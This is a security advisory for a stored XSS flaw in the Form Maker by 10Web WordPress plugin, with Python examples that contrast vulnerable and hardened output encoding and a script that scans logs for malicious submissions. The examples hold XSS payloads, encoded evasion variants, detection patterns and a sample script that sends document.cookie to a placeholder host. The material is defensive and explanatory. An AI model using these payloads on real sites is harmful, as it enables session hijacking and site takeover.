CVE-2026-1065
WordPress · WordPress Form Maker by 10Web plugin
Executive summary
A high-severity vulnerability exists within the Form Maker by 10Web plugin for WordPress, identified as CVE-2026-1065. The flaw allows an unauthenticated attacker to inject client-side script into the site by submitting a specially crafted form entry; the script runs later in the browser of an administrator or other privileged user who views that submission. This can lead to the compromise of administrator or user accounts, theft of sensitive data, and takeover of the affected website.
Vulnerability
The vulnerability is a Stored Cross-Site Scripting (XSS) flaw. An unauthenticated attacker can place malicious client-side script (for example JavaScript) in the fields of a form created by the plugin and submit it. The plugin fails to properly sanitize this input before storing it in the database, and the stored values are later rendered without escaping. When a privileged user, such as an administrator, views the submitted form data in the WordPress backend, the script executes in the context of that user's browser session, allowing the attacker to hijack the session, steal credentials, perform actions on the user's behalf, or redirect them to a malicious site. Because the payload only fires when the stored entry is viewed, the attacker does not see when or whether it ran unless the payload reports back, and an injected entry may sit in the submissions table for some time before it triggers.
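The following is an added illustration of the sink described above and of why the fix is context-aware output encoding; it is Python written for this page, not code from the plugin or from 10Web (WordPress plugins are PHP). The submissions are constructed, the table markup is an assumption, and the two `html.escape` variants stand in for WordPress's `esc_html()` (element content) and `esc_attr()` (attribute values). The half-fixed variant shows the mistake of using one escaper for every context.

```python
"""Added example (Python illustration, not the plugin's PHP): the stored-XSS
sink described above, and why the fix is context-aware output encoding.
Submitted values are stored verbatim; what matters is how the admin
'submissions' page renders them. html.escape stands in for WordPress's
esc_html() (element content) and esc_attr() (attribute values)."""
import html

# Constructed submissions. The second is the kind of entry an unauthenticated
# visitor could post through a public form: one payload aimed at element
# content, one aimed at breaking out of a quoted attribute.
SUBMISSIONS = [
    {"name": "Alice", "message": "Hello, I have a question about pricing."},
    {"name": "<img src=x onerror=alert(document.cookie)>",
     "message": '" autofocus onfocus="alert(1)'},
]


def escape_text(value):
    """Element content: &, < and > must be encoded (esc_html analogue)."""
    return html.escape(value, quote=False)


def escape_attr(value):
    """Quoted attribute value: quotes must be encoded as well (esc_attr analogue)."""
    return html.escape(value, quote=True)


def render_admin_view(entries, encode_text, encode_attr):
    """Build the submissions table an admin page would show (assumed markup).
    The two encoders decide what reaches the browser; the markup is the same
    in every variant."""
    rows = []
    for entry in entries:
        rows.append(
            f'<tr><td>{encode_text(entry["name"])}</td>'
            f'<td><input type="text" value="{encode_attr(entry["message"])}"></td></tr>'
        )
    return "<table>" + "".join(rows) + "</table>"


def render_vulnerable(entries):
    """The flaw: stored values are interpolated with no encoding at all."""
    return render_admin_view(entries, lambda v: v, lambda v: v)


def render_half_fixed(entries):
    """A common incomplete fix: one text escaper used for every context.
    The <img> payload is neutralised, but the quote in the attribute payload
    survives and the input element gains an onfocus handler."""
    return render_admin_view(entries, escape_text, escape_text)


def render_hardened(entries):
    """Correct: encode each value for the context it lands in."""
    return render_admin_view(entries, escape_text, escape_attr)


if __name__ == "__main__":
    for label, fn in (("vulnerable", render_vulnerable),
                      ("half-fixed", render_half_fixed),
                      ("hardened", render_hardened)):
        print(f"--- {label} ---\n{fn(SUBMISSIONS)}\n")
```

Running the file prints the three renderings side by side: in the vulnerable output the second row contains a live `<img onerror>` and an `<input>` that has grown an `onfocus` handler; in the half-fixed output only the first payload is neutralised; in the hardened output both are inert text. The lesson for reviewing a patch to a bug of this class is to check the escaping at each sink against the HTML context it writes into, not just that "some escaping was added".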
Business impact
This vulnerability is rated as High severity with a CVSS score of 7.2. Successful exploitation could lead to significant business impact, including the compromise of administrator accounts. Because a WordPress administrator can install plugins and edit theme files from the dashboard, script running in an administrator's session is in practice equivalent to full control of the site. This could result in website defacement, theft of sensitive data submitted by users through forms (personally identifiable information, etc.), loss of customer trust, and reputational damage. The compromised website could also be used as a platform to host malware or launch further attacks against visitors.
Remediation
Immediate Action:
- Immediately update the "Form Maker by 10Web" plugin to the latest version provided by the vendor, which contains a patch for this vulnerability.
- If the plugin is not essential for business operations, consider deactivating and removing it entirely to eliminate the attack surface.
- Review WordPress user accounts for any unauthorized or suspicious accounts created recently.
Proactive Monitoring:
- Monitor web server and application logs for unusual POST requests to form submission endpoints, particularly those containing HTML tags (<script>, <img>, <iframe>, <svg>) or JavaScript event handlers (onerror, onload, onfocus). Note that a standard access log records only the request line, not the POST body, so this check needs request-body logging (for example a WAF or ModSecurity audit log) or has to be run against the stored submissions themselves; expect payloads to be percent-encoded, entity-encoded or mixed-case, and decode before matching.
- Implement file integrity monitoring to detect unauthorized changes to plugin files or WordPress core files.
- Review form submission data for any stored entries that appear to contain malicious code.
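The following is an added example of the triage the two monitoring items above call for; it is not the page's or 10Web's code. It scans a request-body log for crafted submissions, undoing the encodings an attacker would use to evade naive string matching. The tab-separated log format, the `/contact/` form page and the log lines are constructed for the example; a WAF or ModSecurity audit log, or rows exported from the plugin's submissions table, carry the same information and the same `find_xss()` check applies to them.

```python
"""Added example (not the page's or 10Web's code): triage a request-body log
for the crafted submissions the monitoring guidance above describes. The log
format and the /contact/ form page are constructed for the example; a WAF or
ModSecurity audit log, or rows exported from the plugin's submissions table,
carry the same information. Plain access logs do not record POST bodies."""
import html
import re
from urllib.parse import parse_qs, unquote

# Constructed, tab-separated: time, client, method, URI, raw POST body.
# Clients 198.51.100.x are benign traffic; 203.0.113.7 sends four payloads:
# a plain <script>, a double-percent-encoded <img onerror>, a mixed-case
# javascript: URI and an HTML-entity-encoded <svg onload>.
SAMPLE_LOG = """\
2026-01-14T10:02:11Z\t198.51.100.4\tPOST\t/contact/\tname=Alice&message=Hello%2C+a+question+about+pricing
2026-01-14T10:02:40Z\t203.0.113.7\tPOST\t/contact/\tname=%3Cscript%3Efetch%28%27https%3A%2F%2Fexample.net%2F%3F%27%2Bdocument.cookie%29%3C%2Fscript%3E&message=hi
2026-01-14T10:03:05Z\t203.0.113.7\tPOST\t/contact/\tname=Bob&message=%253Cimg%2520src%253Dx%2520onerror%253Dalert%25281%2529%253E
2026-01-14T10:03:30Z\t203.0.113.7\tPOST\t/contact/\tname=Bob&website=JaVaScRiPt%3Aalert%281%29&message=%26lt%3Bsvg+onload%3Dalert%281%29%26gt%3B
2026-01-14T10:04:00Z\t198.51.100.9\tGET\t/contact/\t
"""

# Triage-grade patterns, applied after normalisation. Deliberately broad:
# the goal is to surface entries for a human to look at, not to replace a WAF.
LABELLED_PATTERNS = [
    ("html-tag", re.compile(
        r"<\s*/?\s*(script|iframe|img|svg|object|embed|link|meta|base|form|input|style)\b")),
    ("event-handler", re.compile(r"\bon[a-z]{2,}\s*=")),   # onerror=, onload=, onfocus= ...
    ("javascript-uri", re.compile(r"\b(javascript|vbscript)\s*:")),
]


def normalise(value, rounds=3):
    """Strip stacked encodings an attacker may use to slip past naive
    string matching: repeated percent-encoding and HTML entities. Then
    lower-case so tag and handler names match regardless of case."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value.replace("\x00", "").lower()


def find_xss(value):
    """Sorted labels of every pattern that matches one decoded field value."""
    norm = normalise(value)
    return sorted(label for label, rx in LABELLED_PATTERNS if rx.search(norm))


def scan_log(text, form_paths=("/contact/",)):
    """Report suspicious fields in POSTs to the form pages. Each finding keeps
    the client and time so hits can be pivoted against the rest of the logs."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, uri, body = line.split("\t", 4)
        if method != "POST" or uri.split("?", 1)[0] not in form_paths:
            continue
        # parse_qs undoes the form-encoding layer; normalise() handles the rest.
        for field, values in parse_qs(body, keep_blank_values=True).items():
            for value in values:
                labels = find_xss(value)
                if labels:
                    findings.append({"time": ts, "client": client, "uri": uri,
                                     "field": field, "labels": labels,
                                     "decoded": normalise(value)[:80]})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['uri']} field={f['field']} "
              f"{','.join(f['labels'])}: {f['decoded']}")
```

Run directly, the script reports four findings, all from 203.0.113.7, and none for the benign submission. The same `find_xss()` can be pointed at values pulled from the plugin's submissions table to satisfy the "review stored entries" item; tune `form_paths` to the pages that host forms on the site, and expect to widen or narrow the patterns after a first pass over real data.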
Compensating Controls:
- If immediate patching is not feasible, deploy a Web Application Firewall (WAF) with rulesets configured to detect and block common XSS attack payloads. Treat this as a stopgap: the WAF must inspect POST bodies, not just URLs, and XSS signatures are routinely bypassed with alternative encodings, tag names and event handlers.
- Implement a strong Content Security Policy (CSP) to restrict the sources from which scripts can be executed, thereby mitigating the impact of an XSS injection. The policy has to cover the wp-admin pages where the stored data is rendered; WordPress admin screens rely heavily on inline scripts, and a policy that allows 'unsafe-inline' does not block injected inline script, so a useful policy needs nonces or hashes and must be tested against the dashboard before rollout.
- Restrict access to the WordPress administrative dashboard (/wp-admin/) to trusted IP addresses only. This does not stop the stored script from running in an administrator's browser, but it blunts session-cookie theft, since a stolen cookie replayed from an untrusted address is rejected; the script can still act from inside the administrator's own session.
Exploitation status
Public Exploit Available: False
Analyst recommendation
Given the high severity (CVSS 7.2) of this vulnerability and its presence in a popular form-building plugin, we strongly recommend immediate remediation. Organizations using the affected "Form Maker by 10Web" plugin should prioritize applying the vendor-supplied security update without delay. Although no public exploit is known and there is no evidence of active exploitation in the wild, the flaw is reachable by unauthenticated users and requires only that an administrator open the submissions view, so the risk of compromise is significant and proactive patching is the most effective defense.